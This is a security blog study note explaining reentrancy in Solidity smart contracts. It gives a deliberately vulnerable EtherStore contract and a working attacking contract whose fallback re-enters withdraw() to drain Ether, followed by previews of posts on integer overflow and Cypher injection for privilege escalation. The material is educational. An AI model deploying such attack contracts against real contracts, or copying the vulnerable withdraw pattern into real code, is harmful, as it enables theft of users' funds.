# Smart Contract Security Studies - Reentrancy Attack Summary This vulnerability occurs when a contract interacts with an external contract before modifying it's own local state variables. Which can sometimes be taken advantage of by placing a malicious fallback() function in the receiving contract. ![](https://i.imgur.com/pqJ3Bcf.png) ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.10; // VICTIM CONTRACT contract EtherStore { mapping(address => uint) public balances; function deposit() public payable { balances[msg.sender] += msg.value; // set the balance of the sender to whatever the sender sent } function withdraw() public { // (step 3 & 5 of diagram) uint bal = balances[msg.sender]; require(bal > 0); // make sure balance is above 0 (bool sent, ) = msg.sender.call{value: bal}(""); // Send eth to the person calling withdraw require(sent, "Failed to send Ether"); balances[msg.sender] = 0; // finally set balance of sender to 0 } // Helper function to check the balance of this contract function getBalance() public view returns (uint) { return address(this).balance; // return the balance of the contract } } ``` ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.10; // ATTACKING CONTRACT contract Attack { EtherStore public etherStore; constructor(address _etherStoreAddress) { etherStore = EtherStore(_etherStoreAddress); } // fallback() is called when eth is sent to this contract, as no other function identifier or data has been specified on behalf of the victim contract fallback() external payable { // fallback function calls the withdraw function again - note that this is called before the victim contract reaches the `balances[msg.sender] = 0;` code, meaning the victim contract won't properly update the attackers balance, and the attacker will be able to steal more eth than what's expected (step 4 of the diagram) if (address(etherStore).balance >= 1 ether) { etherStore.withdraw(); // re-call the vulnerable function } } function attack() external payable { require(msg.value >= 1 ether); etherStore.deposit{value: 1 ether}(); // initiate the attack by depositing 1 eth (see step one of diagram) etherStore.withdraw(); // immediately withdraw 1 eth from the victim contract, triggering the reentrance attack. (step 2 of diagram) } // Helper function to check the balance of this contract function getBalance() public view returns (uint) { return address(this).balance; } } ``` ### Resources: - https://www.youtube.com/watch?v=4Mm3BCyHtDY - https://consensys.github.io/smart-contract-best-practices/attacks/reentrancy/
Last changed by  
Chivato
Cyber Security enthusiast and CTF addict studying / working from London.
727

Read more

Finding vulnerabilities in an open-source CMS.

Navigate CMS is “a powerful and intuitive content management system for everybody.” This CMS is used to keep multiple websites managed and updated via the easy-to-use user interface. I chose this application to dig into for vulnerabilities, so that I could practice for my upcoming OSWE exam, while also potentially getting some CVE’s under my belt.

12/22/2023
Initgriti Challenge BSidesLV/DefCon 2023

Intigriti BSides/DefCon challenge

8/31/2023
Smart Contract Security Studies - Overflow and Underflow attacks.

Similar to traditional buffer overflow attacks, in solidity, when variables are defined to be the legacy solidity uint type (and not the safe math version from OpenZeppelin), they can be overflown or underflown to reach unintended conclusions or chunks of code. Note: Only applicable to Solidity < 0.8, as Solidity >= 0.8 will default to an error Vulnerable Contract In the contract below the lockTime variable can be maliciously manipulated to allow an attacker to immediately withdraw funds, when they should only be able to after a week (see below): // The following happens upon depositing any amount into the vulnerable contract. lockTime[msg.sender] = block.timestamp + 1 weeks;

2/7/2022
Fun with Cypher Injections

I recently found a vulnerability type which had been massively under-researched within the public domain. Leaving one, maybe two genuinely interesting research posts. In an attempt to fill a void I dove into a neo4j, which uses cypher queries. Many security specialists will recognise neo4j from the popular AD hacking tool "blood hound". Note that this post is a WIP, and the more I find, the more I'll add. Tips / Tricks Overwriting values in CREATE clauses CREATE clauses in neo4j can have values overwritten if we can inject after it's initial definition. What this means is, if the query creates an "account" object with an "admin" key that is defined before our injection point, we can overwrite it to True to make our account an administrator.

12/24/2021
Read more from Chivato
Published on HackMD